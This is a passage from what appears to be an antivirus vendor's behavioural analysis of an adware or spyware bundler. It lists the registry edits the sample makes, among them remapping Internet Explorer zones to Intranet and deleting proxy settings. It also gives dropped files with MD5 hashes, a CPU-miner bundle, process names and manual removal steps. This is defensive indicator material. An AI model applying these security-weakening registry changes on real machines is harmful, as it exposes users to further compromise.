"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"
The SpyTool modifies IE security zone settings so that all local web nodes whose names contain no dots and that are not assigned to any other zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsd41.tmp:816 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 70 1D BA 92 0B 65 B0 3C 6B 23 E8 3D D8 44 8C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process nsk6.tmp:496 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 9B 39 A8 5A CA 30 F0 7B 6A E4 0A 94 E2 A9 56"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-som-tot-cpm-opw-crr"
The process nsqA.tmp:508 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 1A CD 5D 3A 8E 83 F8 03 9F 3C 23 1F 40 31 02"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\5517\setup.exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\8819.exe |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsc1C.tmp\registry.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi1F.tmp\registry.dll |
f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi2.tmp\inetc.dll |
cf3c49ebab2b29f65fe80ec349072d99 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr18.tmp |
5925c8698cc2f0f44edc9f5dd61fc7cd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr21.tmp |
fce81f5d5e6baabe8eb9f87a1bb3599c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsrD.tmp |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss25.tmp\registry.dll |
029aa26a0dd5ef7bd1ba1639703f8fae | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\7121923af824073a25b2b7e6ba0a6e0e[1].exe |
5925c8698cc2f0f44edc9f5dd61fc7cd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\Bundle_CPUminer[1].exe |
5c9336efb1faf577655bcd88a444c26b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\CESwN2Es[1].exe |
cf3c49ebab2b29f65fe80ec349072d99 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Bundle_OperaRUnew[1].exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\setup[1].exe |
d4937ebdbcea35fc0f12233e57c30ca4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\cmmdWriter[1].exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe |
e6b0bc04dca07169abfc4456c4671307 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\PepperFlash\pepflashplayer.dll |
0bcd0698977726a660321b4fec8f4a5e | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome.dll |
6d64fd7d8a69a39ed4ddcf0cd8d26b4b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_child.dll |
72f70472e350b35290839f3e2802b4f4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_elf.dll |
c81e0c917d5db4fecd2ec3c7e2712bbf | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\d3dcompiler_46.dll |
634ec1dc874c89711b94b5c279987d66 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe |
6e98034de60d2e96b4bbb148bbeabadb | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\ffmpegsumo.dll |
17baa5fcf3b9206cc0395a7cc38be7ac | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libegl.dll |
2b8929f7edc2df8925066cb0e7067365 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libexif.dll |
a25f20a5664891bc292970bd23acbf21 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libglesv2.dll |
302f011627a16ce5555e39ec53d4fbdd | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\metro_driver.dll |
814cb49f7706f681723ea9b5746987e4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\nacl64.exe |
90871478e7b9765cccb884751bfafc7b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\pdf.dll |
4120c792ee30c922d95c5201cedade29 | c:\Program Files\MyBrowser\MyBrowser\Application\mybrowser.exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Program Files\MyBrowser\MyBrowser\Application\utility.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click here to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
upgmsd_re_005010096.exe:1928
gmsd_re_005010096.exe:740
nsk15.tmp:1340
nsj35.tmp:588
8819.exe:368
nssF.tmp:1488
setup.exe:828
taskkill.exe:1408
taskkill.exe:248
taskkill.exe:1092
wmic.exe:1336
amisid.exe:496
amisid.exe:600
tasklist.exe:1852
tasklist.exe:492
nsr18.tmp:1388
nsr18.tmp:460
nsx27.tmp:1340
nsx27.tmp:336
encrypt.exe:1700
encrypt.exe:1364
encrypt.exe:1564
encrypt.exe:496
%original file name%.exe:860
nsd41.tmp:816
nsk6.tmp:496
nsqA.tmp:508
- Delete the original SpyTool file.
- Delete or disinfect the following files created/modified by the SpyTool:
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.cyl (428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\DSS_Unq_IMapplication_mon_remote[1].htm (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\SecondResult.txt (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\OfferScreen_460.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\gmsd_re_005010096\1.20\cnf.cyl (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Bundle_OperaRUnew[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr18.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3A.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj39.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj38.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh33.tmp (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\BiTool[1].dll (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\modern-wizard.bmp (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb32.tmp (108018 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bitool.xxx (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\xml.dll (2005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsis142.xml (1557 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\Banner.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsischeck654.xml (4183 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\setup[1].exe (28320 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\gizmodo.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\theguardian.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nba.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\imdb.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_translate.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\msn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\cnn.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\pinterest.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\search.ico (1917 bytes)
%WinDir%\Tasks\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.job (1656 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\youtube.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\expedia.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\groupom.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\reddit.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\icon.json (21 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\booking.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\facebook.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\huffingtonpost.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_search.ico (5593 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yandex.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\weather_channel.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\espn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\mail_live_msn.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\forbes.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\setup.exe (37305 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\chrome.packed.7z (1342431 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bbc.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ebay.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\linkedin.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\wikipedia.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\tripadvisor.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\twitter.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].001 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\netflix.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\prefs (823 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\mail.ru.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\tumblr.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\amazon.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\kayak.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bing.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8819.exe (14988 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin (4 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
